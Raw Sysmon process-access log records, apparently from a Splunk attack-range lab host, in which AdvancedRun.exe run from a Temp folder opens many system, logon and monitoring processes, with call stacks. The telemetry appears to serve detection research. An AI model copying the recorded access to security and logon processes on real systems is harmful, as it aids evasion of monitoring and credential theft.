20:15:10.569{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075975Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.569{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075974Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.568{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075973Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.568{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075972Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.568{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075971Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.565{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075970Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.565{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075969Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.565{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004075968Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.564{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075967Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.564{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075966Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.564{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075965Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.564{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075964Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.564{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075963Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.559{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075962Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.559{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075961Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.554{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075960Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.554{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075959Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 